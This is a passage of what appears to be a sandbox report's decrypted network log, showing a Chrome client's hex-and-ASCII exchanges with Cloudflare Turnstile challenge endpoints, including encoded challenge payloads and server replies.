2024-06-21 15:59:06 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:08 UTC	917	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 31616 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 1eefe65da7da1cb sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:08 UTC	16384	OUT	Data Raw: 76 5f 38 39 37 35 33 34 30 39 64 64 32 34 63 34 31 33 3d 31 63 33 61 70 25 32 62 43 58 36 2b 33 5a 48 68 58 2b 6e 68 6e 47 33 44 52 68 66 68 56 62 68 2d 61 53 75 43 52 68 47 61 33 33 68 4a 68 36 61 64 75 61 68 69 33 68 67 61 55 48 68 52 68 6e 61 43 2d 36 2b 34 52 74 33 4e 43 71 68 4f 24 57 30 71 33 49 6d 50 33 75 43 46 68 65 33 68 41 68 5a 24 67 33 68 31 70 2b 78 6e 68 57 37 2b 53 42 68 33 54 73 31 78 68 50 4e 50 68 5a 6c 62 33 68 64 44 39 68 68 50 78 68 31 36 61 68 31 49 4f 48 43 2d 68 2b 7a 6b 75 24 47 4a 66 6d 61 68 6a 61 44 24 36 61 68 6e 61 58 5a 45 6d 34 4e 33 36 66 7a 6b 72 4a 64 63 68 50 54 45 2d 65 51 34 76 4a 33 33 4e 66 59 33 76 61 44 56 58 68 77 33 5a 78 2d 41 4b 74 6e 58 77 52 73 33 62 65 6f 73 32 52 44 76 52 44 51 4d 4c 6a 49 67 66 6d 46 67 Data Ascii: v_89753409dd24c413=1c3ap%2bCX6+3ZHhX+nhnG3DRhfhVbh-aSuCRhGa33hJh6aduahi3hgaUHhRhnaC-6+4Rt3NCqhO$W0q3ImP3uCFhe3hAhZ$g3h1p+xnhW7+SBh3Ts1xhPNPhZlb3hdD9hhPxh16ah1IOHC-h+zku$GJfmahjaD$6ahnaXZEm4N36fzkrJdchPTE-eQ4vJ33NfY3vaDVXhw3Zx-AKtnXwRs3beos2RDvRDQMLjIgfmFg
2024-06-21 15:59:08 UTC	15232	OUT	Data Raw: 52 43 37 68 34 61 79 46 6b 7a 4d 78 43 53 37 55 49 49 35 65 68 68 72 51 74 42 5a 61 78 68 64 68 2b 33 68 24 68 53 61 68 48 68 50 68 33 37 68 48 68 72 61 55 32 43 41 68 51 36 44 6d 43 51 68 67 68 33 6b 45 58 68 5a 61 2b 33 44 39 33 48 61 43 33 43 52 68 51 68 55 33 43 47 68 39 61 43 36 43 57 68 71 6d 49 48 2b 6e 68 47 63 79 61 5a 6b 68 44 61 2b 61 6d 2b 68 37 61 68 68 55 45 61 69 68 2b 61 75 61 43 77 36 64 67 2b 67 4a 76 61 68 71 68 68 68 76 31 37 43 57 61 50 68 68 52 43 35 61 35 68 6f 6b 70 33 43 72 68 5a 61 55 35 68 49 61 31 33 2b 56 68 6a 68 68 36 68 24 68 51 61 65 48 68 42 37 42 61 33 37 4d 6e 68 4f 61 44 54 2b 42 68 4e 68 2b 58 43 2b 43 59 37 65 63 2b 58 68 6e 61 50 36 44 6b 68 62 72 4b 75 43 4b 75 37 63 68 5a 56 4a 68 48 36 2b 58 44 4f 68 37 43 79 48 Data Ascii: RC7h4ayFkzMxCS7UII5ehhrQtBZaxhdh+3h$hSahHhPh37hHhraU2CAhQ6DmCQhgh3kEXhZa+3D93HaC3CRhQhU3CGh9aC6CWhqmIH+nhGcyaZkhDa+am+h7ahhUEaih+auaCw6dg+gJvahqhhhv17CWaPhhRC5a5hokp3CrhZaU5hIa13+Vhjhh6h$hQaeHhB7Ba37MnhOaDT+BhNh+XC+CY7ec+XhnaP6DkhbrKuCKu7chZVJhH6+XDOh7CyH
2024-06-21 15:59:08 UTC	322	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:08 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 22200 Connection: close cf-chl-gen: 71Vi6ZD2zYDVHBgWepDTS9cuYrYcFMeAHjbHnUnDAKmLIN9m1SEw2ZiePnbcVjwn$ecAiBNRMzfZTufopqnOIyg== Server: cloudflare CF-RAY: 8975343beba65e62-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:08 UTC	1047	IN	Data Raw: 67 34 68 46 67 55 56 70 66 6d 74 65 62 48 35 74 61 47 4a 73 69 34 4f 56 64 48 31 6e 5a 32 79 42 61 32 75 65 64 48 52 76 6d 61 70 6f 5a 4b 6d 65 67 5a 32 6b 61 47 2b 66 70 58 36 77 72 49 4b 79 64 61 74 33 6a 72 79 54 66 72 47 2f 67 71 2b 44 76 6e 6d 55 78 5a 53 33 74 4d 33 4a 6f 36 4f 39 76 4c 76 52 77 36 6e 46 74 70 44 58 30 35 4b 30 33 74 6e 49 6b 2b 4b 31 6f 65 4c 65 70 36 66 6c 74 4e 66 4b 36 65 36 76 78 39 7a 63 78 66 48 68 79 65 58 6b 72 2f 6a 7a 73 73 66 32 73 62 66 39 77 63 4c 66 32 41 61 35 32 67 73 4c 42 73 4c 66 44 67 6e 4f 34 51 77 4d 79 67 49 58 41 76 50 70 46 42 59 52 47 78 77 5a 2f 74 4d 67 34 43 49 67 2b 52 62 36 34 43 54 70 44 41 41 76 47 76 73 45 4d 52 30 73 44 42 45 45 43 67 55 50 45 68 73 5a 45 55 44 37 45 68 72 36 4d 78 4d 67 41 30 5a Data Ascii: g4hFgUVpfmtebH5taGJsi4OVdH1nZ2yBa2uedHRvmapoZKmegZ2kaG+fpX6wrIKydat3jryTfrG/gq+DvnmUxZS3tM3Jo6O9vLvRw6nFtpDX05K03tnIk+K1oeLep6fltNfK6e6vx9zcxfHhyeXkr/jzssf2sbf9wcLf2Aa52gsLBsLfDgnO4QwMygIXAvPpFBYRGxwZ/tMg4CIg+Rb64CTpDAAvGvsEMR0sDBEECgUPEhsZEUD7Ehr6MxMgA0Z
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 55 6e 58 57 64 6f 48 6c 2f 59 35 68 32 64 4a 4a 6b 69 59 43 68 66 6d 64 6e 6f 49 4b 76 66 71 52 79 70 34 32 6b 67 35 4a 7a 6d 58 53 4d 64 36 6e 42 6c 36 47 39 77 61 44 4a 6c 70 53 47 6e 4c 33 44 70 36 58 4f 6d 71 6d 74 6b 38 66 41 70 4d 69 71 71 71 72 4d 72 74 75 71 30 4a 33 4f 6c 74 58 47 73 4a 72 6f 33 38 6a 6f 33 63 37 6a 77 75 48 53 75 38 2b 31 78 50 54 35 32 4d 6e 50 38 62 6d 33 2b 76 73 44 76 74 76 44 37 77 66 79 31 41 76 58 31 41 58 64 44 76 44 36 33 74 2f 6f 38 52 55 53 37 2b 62 36 34 75 7a 76 46 4e 72 36 48 66 73 44 47 79 45 50 48 79 41 5a 4a 51 45 70 43 4f 51 6b 37 77 50 6a 4a 43 67 49 37 51 48 79 42 7a 67 30 45 6a 34 39 2f 44 63 70 4f 43 51 53 4e 2f 34 34 47 45 6f 72 43 6b 77 36 48 51 70 52 52 44 45 4f 56 55 55 31 45 6c 6b 36 4f 52 5a 64 4f 7a Data Ascii: UnXWdoHl/Y5h2dJJkiYChfmdnoIKvfqRyp42kg5JzmXSMd6nBl6G9waDJlpSGnL3Dp6XOmqmtk8fApMiqqqrMrtuq0J3OltXGsJro38jo3c7jwuHSu8+1xPT52MnP8bm3+vsDvtvD7wfy1AvX1AXdDvD63t/o8RUS7+b64uzvFNr6HfsDGyEPHyAZJQEpCOQk7wPjJCgI7QHyBzg0Ej49/DcpOCQSN/44GEorCkw6HQpRRDEOVUU1Elk6ORZdOz
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 6d 48 78 6a 64 70 61 69 68 61 65 58 70 33 65 47 67 6e 32 48 68 49 4b 79 6b 59 69 35 6c 4a 47 31 65 37 43 64 69 62 42 39 73 73 4c 45 76 4c 65 5a 74 72 2b 6f 68 4a 76 46 77 36 6e 49 70 38 33 56 71 63 65 68 6f 39 48 5a 74 70 4c 4f 74 4c 7a 4e 30 72 69 30 30 64 61 37 32 74 58 61 76 38 7a 5a 33 73 50 63 72 38 6d 37 75 39 50 51 76 37 44 33 75 4d 71 36 30 4f 6e 58 73 65 44 55 30 73 76 79 39 67 54 34 39 75 54 45 33 4f 41 49 31 73 6e 62 43 76 37 50 35 51 54 31 79 65 6f 4b 41 39 54 54 36 78 66 78 2f 52 59 4f 4a 4f 38 65 4a 67 50 65 47 77 41 4e 47 68 38 45 48 65 38 4b 2b 2f 73 55 45 51 44 77 4f 50 67 4c 2b 68 45 71 4b 55 45 4a 46 78 67 31 4d 79 46 41 4f 54 63 6c 43 54 30 37 4e 67 31 42 50 7a 73 6d 52 55 4d 33 55 45 6c 48 4f 78 55 74 4d 56 67 6e 47 69 78 61 54 79 41 Data Ascii: mHxjdpaihaeXp3eGgn2HhIKykYi5lJG1e7CdibB9ssLEvLeZtr+ohJvFw6nIp83Vqceho9HZtpLOtLzN0ri00da72tXav8zZ3sPcr8m7u9PQv7D3uMq60OnXseDU0svy9gT49uTE3OAI1snbCv7P5QT1yeoKA9TT6xfx/RYOJO8eJgPeGwANGh8EHe8K+/sUEQDwOPgL+hEqKUEJFxg1MyFAOTclCT07Ng1BPzsmRUM3UElHOxUtMVgnGixaTyA
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 58 65 6c 6d 6d 74 2b 70 71 65 51 62 4b 57 46 6b 34 71 71 6b 59 61 46 75 4c 71 59 77 63 47 52 75 72 75 42 75 5a 79 62 73 59 71 44 79 63 57 4c 70 4b 4b 69 71 4d 75 6f 6c 4b 71 52 79 4e 69 52 77 36 2b 31 6d 38 7a 63 75 74 6e 42 31 4e 32 67 77 65 57 6d 6e 4e 33 6f 72 64 6a 66 38 65 75 78 34 36 7a 75 73 37 58 4a 2b 66 50 56 2b 66 33 34 32 63 34 42 31 76 54 56 2f 73 55 42 32 51 4d 46 33 51 6f 4f 43 51 48 68 37 77 76 68 36 67 6e 57 7a 68 6e 54 34 2f 54 33 2b 39 6f 61 2f 4f 6f 58 2b 2f 51 41 44 2f 30 69 49 79 45 73 34 67 6a 32 47 2f 6b 69 35 43 34 78 2f 6a 49 44 4b 66 4d 33 44 54 73 63 4e 78 49 59 4e 67 4e 45 4a 41 50 34 48 42 73 72 48 55 51 63 44 53 4d 48 4a 7a 34 53 4b 67 63 66 50 30 6b 31 4c 68 73 76 58 6a 42 48 58 6c 4a 69 4e 46 78 59 56 31 34 7a 55 54 34 32 Data Ascii: Xelmmt+pqeQbKWFk4qqkYaFuLqYwcGRuruBuZybsYqDycWLpKKiqMuolKqRyNiRw6+1m8zcutnB1N2gweWmnN3ordjf8eux46zus7XJ+fPV+f342c4B1vTV/sUB2QMF3QoOCQHh7wvh6gnWzhnT4/T3+9oa/OoX+/QAD/0iIyEs4gj2G/ki5C4x/jIDKfM3DTscNxIYNgNEJAP4HBsrHUQcDSMHJz4SKgcfP0k1LhsvXjBHXlJiNFxYV14zUT42
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 65 48 69 62 47 30 6a 5a 4e 33 72 4b 2b 33 73 49 2b 56 6e 4c 65 56 6c 35 61 30 66 4a 57 47 68 4d 4f 6b 6d 72 7a 41 70 63 6d 50 78 4d 66 43 78 62 36 70 73 73 6e 54 73 36 37 48 6b 4a 32 72 71 5a 36 36 34 4c 2f 47 31 75 62 54 34 63 53 70 35 74 7a 6e 78 4c 44 62 37 2f 53 74 38 63 62 5a 37 66 66 53 2b 76 75 37 2b 64 79 33 76 51 58 33 35 4d 45 4a 2b 4f 6a 46 44 65 33 73 79 52 48 75 38 4d 30 56 38 38 76 69 33 2f 44 6d 30 52 6f 49 47 41 7a 70 39 2b 7a 78 46 67 49 65 37 79 63 6e 49 50 4c 6e 35 2b 6a 36 34 65 76 73 41 50 33 76 38 41 55 30 38 2f 51 4a 4a 53 38 34 2b 78 55 50 44 41 73 55 4d 69 4e 45 42 54 5a 4b 43 68 38 63 4a 30 55 78 48 45 6b 46 45 43 5a 4d 4a 30 78 4a 54 46 46 55 46 43 68 56 51 44 5a 66 47 32 49 37 51 68 39 53 5a 7a 63 30 50 54 74 74 58 56 6b 38 61 Data Ascii: eHibG0jZN3rK+3sI+VnLeVl5a0fJWGhMOkmrzApcmPxMfCxb6pssnTs67HkJ2rqZ664L/G1ubT4cSp5tznxLDb7/St8cbZ7ffS+vu7+dy3vQX35MEJ+OjFDe3syRHu8M0V88vi3/Dm0RoIGAzp9+zxFgIe7ycnIPLn5+j64evsAP3v8AU08/QJJS84+xUPDAsUMiNEBTZKCh8cJ0UxHEkFECZMJ0xJTFFUFChVQDZfG2I7Qh9SZzc0PTttXVk8a
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 6d 64 49 57 47 71 4a 31 38 73 72 47 53 74 35 43 75 75 36 53 41 74 73 43 2f 6d 4c 6d 38 78 36 53 52 70 61 2b 66 78 38 4b 50 73 4d 2b 52 31 71 2b 33 6c 64 71 7a 75 36 4b 64 72 39 57 30 35 62 53 6d 75 38 48 4e 76 4d 76 4b 38 62 33 4d 72 73 61 76 78 63 76 77 74 62 50 32 36 37 66 31 31 37 2f 72 41 77 4c 4f 34 65 4c 44 39 74 6a 70 31 4f 4c 35 2b 4f 62 6c 30 42 51 56 38 4f 6e 72 34 68 72 6c 41 78 73 57 38 4e 30 59 43 52 67 4c 49 50 7a 65 47 50 7a 36 2f 69 6a 6e 35 79 34 76 42 69 66 76 4a 44 4d 30 4a 43 77 58 42 43 77 4b 4f 42 51 77 44 2f 46 43 50 54 68 46 45 44 45 5a 46 51 5a 43 4d 2f 30 4e 4a 78 31 42 50 55 30 71 4b 43 34 2f 55 53 6b 6f 4b 31 6b 72 46 43 34 6f 4b 46 34 35 50 79 38 78 54 68 6c 47 5a 56 38 39 57 6c 6b 74 4c 55 52 4b 57 32 31 52 50 55 38 74 64 53 Data Ascii: mdIWGqJ18srGSt5Cuu6SAtsC/mLm8x6SRpa+fx8KPsM+R1q+3ldqzu6Kdr9W05bSmu8HNvMvK8b3MrsavxcvwtbP267f117/rAwLO4eLD9tjp1OL5+Obl0BQV8Onr4hrlAxsW8N0YCRgLIPzeGPz6/ijn5y4vBifvJDM0JCwXBCwKOBQwD/FCPThFEDEZFQZCM/0NJx1BPU0qKC4/USkoK1krFC4oKF45Py8xThlGZV89WlktLURKW21RPU8tdS
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 76 4a 57 64 69 34 4b 62 74 4a 65 56 6b 71 47 42 66 70 57 71 6d 4b 47 61 6d 73 32 65 6c 62 43 71 31 62 4f 4d 6d 73 61 63 71 64 47 63 74 72 76 44 6f 4c 76 42 34 72 33 44 36 38 53 36 72 4c 6d 71 37 63 76 6b 76 2f 54 49 36 4f 6e 34 7a 37 48 78 75 37 33 72 76 66 32 2f 41 4e 2f 56 33 62 7a 57 77 65 4d 4a 32 67 6e 58 35 75 6f 4f 32 77 45 43 35 65 2f 4d 7a 2b 66 70 44 52 58 62 33 50 62 79 32 50 6b 6a 41 4e 33 30 38 66 63 70 2f 52 7a 33 34 77 45 67 44 43 34 47 4e 43 38 45 43 69 67 79 39 52 41 72 2b 6a 6f 53 43 66 34 2b 46 6a 55 75 2b 78 70 48 42 77 59 66 46 69 67 45 49 56 41 59 55 53 74 55 4c 42 49 72 4d 69 68 61 4c 6c 78 53 57 54 49 71 4f 54 41 34 56 44 42 6c 50 46 68 69 5a 7a 35 63 4f 43 52 48 63 45 42 74 52 6e 52 75 4d 6b 70 43 54 44 5a 51 62 46 56 4d 55 31 6b Data Ascii: vJWdi4KbtJeVkqGBfpWqmKGams2elbCq1bOMmsacqdGctrvDoLvB4r3D68S6rLmq7cvkv/TI6On4z7Hxu73rvf2/AN/V3bzWweMJ2gnX5uoO2wEC5e/Mz+fpDRXb3Pby2PkjAN308fcp/Rz34wEgDC4GNC8ECigy9RAr+joSCf4+FjUu+xpHBwYfFigEIVAYUStULBIrMihaLlxSWTIqOTA4VDBlPFhiZz5cOCRHcEBtRnRuMkpCTDZQbFVMU1k
2024-06-21 15:59:08 UTC	1369	IN	Data Raw: 34 2f 47 6e 37 75 66 67 36 4b 5a 6c 39 47 6d 6e 72 32 4c 71 63 61 57 31 61 33 4c 73 39 6d 79 75 61 66 65 75 75 4f 7a 35 62 6e 58 76 36 57 39 36 71 71 6b 77 4f 2f 4d 76 38 62 4e 75 2f 4c 4b 77 4c 61 32 7a 66 76 44 2b 39 4c 61 36 51 48 57 7a 4c 37 42 32 77 6a 39 76 39 33 37 32 38 6e 6d 45 4f 73 51 35 52 54 6e 30 75 72 78 38 39 58 75 39 4e 76 72 38 42 44 37 33 76 58 74 2b 79 4c 35 41 67 41 6c 41 79 7a 37 4b 51 45 77 41 43 34 46 4a 43 72 73 43 78 48 79 46 78 4d 36 2b 76 55 4f 50 42 2f 34 43 6b 41 37 47 42 6f 68 43 42 73 6a 53 67 67 63 48 69 70 52 45 53 45 64 4a 42 45 73 4d 52 4d 33 47 6c 77 38 58 54 4d 36 57 68 73 33 5a 45 42 69 50 31 63 34 47 7a 38 32 53 54 77 6b 53 47 39 45 51 6d 56 79 64 45 6c 34 61 6a 56 51 62 57 34 37 55 59 42 71 4f 31 55 36 64 6f 56 62 Data Ascii: 4/Gn7ufg6KZl9Gmnr2LqcaW1a3Ls9myuafeuuOz5bnXv6W96qqkwO/Mv8bNu/LKwLa2zfvD+9La6QHWzL7B2wj9v93728nmEOsQ5RTn0urx89Xu9Nvr8BD73vXt+yL5AgAlAyz7KQEwAC4FJCrsCxHyFxM6+vUOPB/4CkA7GBohCBsjSggcHipRESEdJBEsMRM3Glw8XTM6Whs3ZEBiP1c4Gz82STwkSG9EQmVydEl4ajVQbW47UYBqO1U6doVb

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:09 UTC	487	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:09 UTC	375	IN	HTTP/1.1 404 Not Found Date: Fri, 21 Jun 2024 15:59:09 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: do/Wq04cDmxXxVIyweD1hg==$0zXlnWt/iwCCntjjEPwe3w== Server: cloudflare CF-RAY: 897534445d6418f6-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:09 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:25 UTC	917	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34611 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 1eefe65da7da1cb sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:25 UTC	16384	OUT	Data Raw: 76 5f 38 39 37 35 33 34 30 39 64 64 32 34 63 34 31 33 3d 31 63 33 61 70 25 32 62 43 58 36 2b 33 5a 48 68 58 2b 6e 68 6e 47 33 44 52 68 66 68 56 62 68 2d 61 53 75 43 52 68 47 61 33 33 68 4a 68 36 61 64 75 61 68 69 33 68 67 61 55 48 68 52 68 6e 61 43 2d 36 2b 34 52 74 33 4e 43 71 68 4f 24 57 30 71 33 49 6d 50 33 75 43 46 68 65 33 68 41 68 5a 24 67 33 68 31 70 2b 78 6e 68 57 37 2b 53 42 68 33 54 73 31 78 68 50 4e 50 68 5a 6c 62 33 68 64 44 39 68 68 50 78 68 31 36 61 68 31 49 4f 48 43 2d 68 2b 7a 6b 75 24 47 4a 66 6d 61 68 6a 61 44 24 36 61 68 6e 61 58 5a 45 6d 34 4e 33 36 66 7a 6b 72 4a 64 63 68 50 54 45 2d 65 51 34 76 4a 33 33 4e 66 59 33 76 61 44 56 58 68 77 33 5a 78 2d 41 4b 74 6e 58 77 52 73 33 62 65 6f 73 32 52 44 76 52 44 51 4d 4c 6a 49 67 66 6d 46 67 Data Ascii: v_89753409dd24c413=1c3ap%2bCX6+3ZHhX+nhnG3DRhfhVbh-aSuCRhGa33hJh6aduahi3hgaUHhRhnaC-6+4Rt3NCqhO$W0q3ImP3uCFhe3hAhZ$g3h1p+xnhW7+SBh3Ts1xhPNPhZlb3hdD9hhPxh16ah1IOHC-h+zku$GJfmahjaD$6ahnaXZEm4N36fzkrJdchPTE-eQ4vJ33NfY3vaDVXhw3Zx-AKtnXwRs3beos2RDvRDQMLjIgfmFg
2024-06-21 15:59:25 UTC	16384	OUT	Data Raw: 52 43 37 68 34 61 79 46 6b 7a 4d 78 43 53 37 55 49 49 35 65 68 68 72 51 74 42 5a 61 78 68 64 68 2b 33 68 24 68 53 61 68 48 68 50 68 33 37 68 48 68 72 61 55 32 43 41 68 51 36 44 6d 43 51 68 67 68 33 6b 45 58 68 5a 61 2b 33 44 39 33 48 61 43 33 43 52 68 51 68 55 33 43 47 68 39 61 43 36 43 57 68 71 6d 49 48 2b 6e 68 47 63 79 61 5a 6b 68 44 61 2b 61 6d 2b 68 37 61 68 68 55 45 61 69 68 2b 61 75 61 43 77 36 64 67 2b 67 4a 76 61 68 71 68 68 68 76 31 37 43 57 61 50 68 68 52 43 35 61 35 68 6f 6b 70 33 43 72 68 5a 61 55 35 68 49 61 31 33 2b 56 68 6a 68 68 36 68 24 68 51 61 65 48 68 42 37 42 61 33 37 4d 6e 68 4f 61 44 54 2b 42 68 4e 68 2b 58 43 2b 43 59 37 65 63 2b 58 68 6e 61 50 36 44 6b 68 62 72 4b 75 43 4b 75 37 63 68 5a 56 4a 68 48 36 2b 58 44 4f 68 37 43 79 48 Data Ascii: RC7h4ayFkzMxCS7UII5ehhrQtBZaxhdh+3h$hSahHhPh37hHhraU2CAhQ6DmCQhgh3kEXhZa+3D93HaC3CRhQhU3CGh9aC6CWhqmIH+nhGcyaZkhDa+am+h7ahhUEaih+auaCw6dg+gJvahqhhhv17CWaPhhRC5a5hokp3CrhZaU5hIa13+Vhjhh6h$hQaeHhB7Ba37MnhOaDT+BhNh+XC+CY7ec+XhnaP6DkhbrKuCKu7chZVJhH6+XDOh7CyH
2024-06-21 15:59:25 UTC	1843	OUT	Data Raw: 73 69 2d 75 7a 6a 4d 61 44 72 37 35 61 55 6a 74 50 68 59 30 74 7a 44 6d 68 73 36 50 34 46 35 76 4b 58 47 54 62 4f 68 43 61 33 58 43 64 68 45 68 6d 32 44 58 68 77 61 43 61 74 63 47 45 68 44 75 6f 50 43 6d 31 48 78 5a 31 39 74 68 5a 31 6d 63 68 4d 61 2b 36 4d 2d 30 37 75 55 49 4c 6b 54 62 4b 48 4f 6e 6d 68 51 30 74 34 34 62 4f 50 68 79 75 53 58 68 49 69 2b 58 44 58 68 36 61 43 48 68 77 68 5a 39 48 76 6e 77 68 70 4c 39 77 4b 77 6a 70 6c 70 61 2b 63 62 68 35 79 6b 43 41 68 62 41 34 66 50 45 43 77 37 78 53 68 4a 64 41 35 52 36 33 50 77 49 4c 72 7a 2b 4c 6a 47 68 43 59 6a 5a 68 7a 45 7a 53 55 63 68 42 72 41 2d 78 32 73 24 75 44 52 78 39 62 59 4f 57 69 6d 47 37 6d 55 52 67 6e 24 68 2d 68 52 58 6c 41 69 77 58 43 68 4f 6c 4d 56 61 64 69 6e 4e 4f 69 2d 68 4e 73 75 Data Ascii: si-uzjMaDr75aUjtPhY0tzDmhs6P4F5vKXGTbOhCa3XCdhEhm2DXhwaCatcGEhDuoPCm1HxZ19thZ1mchMa+6M-07uUILkTbKHOnmhQ0t44bOPhyuSXhIi+XDXh6aCHhwhZ9HvnwhpL9wKwjplpa+cbh5ykCAhbA4fPECw7xShJdA5R63PwILrz+LjGhCYjZhzEzSUchBrA-x2s$uDRx9bYOWimG7mURgn$h-hRXlAiwXChOlMVadinNOi-hNsu
2024-06-21 15:59:26 UTC	1257	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 3440 Connection: close cf-chl-out-s: 8FMR+tdH4a5PguOxWZMir8T4+MctKn4MwqBt0VBVASKAygkiltqC/XY1uFT5Bhh3DjXPiUQ2NUTp2/8A6aHsNF2Tn0rbZMcWJFH1NTpM7Zaq4d6SvJvGEotawLw94CTg6AFk0FTuOgG9Mr94ClQxN+5mPmfJ32uxA4/73pGekXNc4sr2U1DzIQane5MfqqwFBxEnLUDJtE4DLauaKIJYj48dAmzgCsiqdea6rgiFGfdw/eljkFJGEU5DGrGAPcBxqjAdozJqAa8enwnLxjlGCC821XqKnfAtBr8QoVH1XDkizbDhm9Yf9ZITBadpmuWFP5gLO7/qHCqj8O+Nk/zovhGXrijysl/S13yFvyYMptEo0CPs6TdiQXOgloDBSswZyRr3a2vfVYzG9csdizKU2ZHVT3xHioIAiMPzbD+m7eYuhlQiIycfNVMiDwdsL/WSNsVVABjWJBmAzM/kFgcCNfAJ9q5Wp6RfXurFE7BfaP/FHTAowv689+jD0ML6+Sod0wx0izABQsG/++bCQ5fY3PJjSVoCkQn6xIoLnfiKFPGOTHCM3SHYB4VUyTmx12VQdeRuWNdBhVyn9XJtswybdUcOJL2NLIoNmdSCy3q3q7AeN3SndFeUBUkf9qNqMtH45+THHyut1MuQNKOcG357PgdhG+rnsg24urGEaV2+aeq4pUqcJQreyVOvZLzhfNczbK2/uTvgqnkwFdYltSEs78jSk41sNVL38owNQjhomdgcf4OHyvx73OpcwcP6FZlgpnvRKOel240wT2QwwMSOeM9oR4A1H9jZ7uzkDQifZlf2MK3Vr+Mzq4sZTnt5HTUY$H2Wz2Ye6OwFP5FyPfMnS+g== cf-chl-out: Tl7JjLc5Yn1/Y5SBowdN/aOC81vslLce3gjIyumOOje8G3YU3a65u9teOnGIjPIaRLqh+JOXPH2AYO51H5w8K6EQVa7KSkn0PsBrqtg/aHfgAaDCIlIRv1YT9A9hPL80$QAztMFHHK8HNA0Zv0kiO7w== Server: cloudflare CF-RAY: 897534abda33430d-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:26 UTC	112	IN	Data Raw: 67 34 68 46 67 55 56 70 66 6d 74 65 62 48 35 74 61 47 4a 73 69 34 4f 56 6b 56 52 77 65 59 35 71 59 5a 52 74 6e 6d 47 6e 59 33 71 6b 61 6e 35 6c 71 36 6d 6b 72 71 70 6c 68 4c 46 2f 6a 4b 6d 46 75 4b 61 74 69 62 35 2b 72 61 48 43 6c 70 72 43 76 6e 6d 55 78 5a 53 30 79 62 76 4f 79 71 65 6f 76 62 76 52 77 36 6e 46 72 74 66 61 31 4a 4b 6c Data Ascii: g4hFgUVpfmtebH5taGJsi4OVkVRweY5qYZRtnmGnY3qkan5lq6mkrqplhLF/jKmFuKatib5+raHClprCvnmUxZS0ybvOyqeovbvRw6nFrtfa1JKl
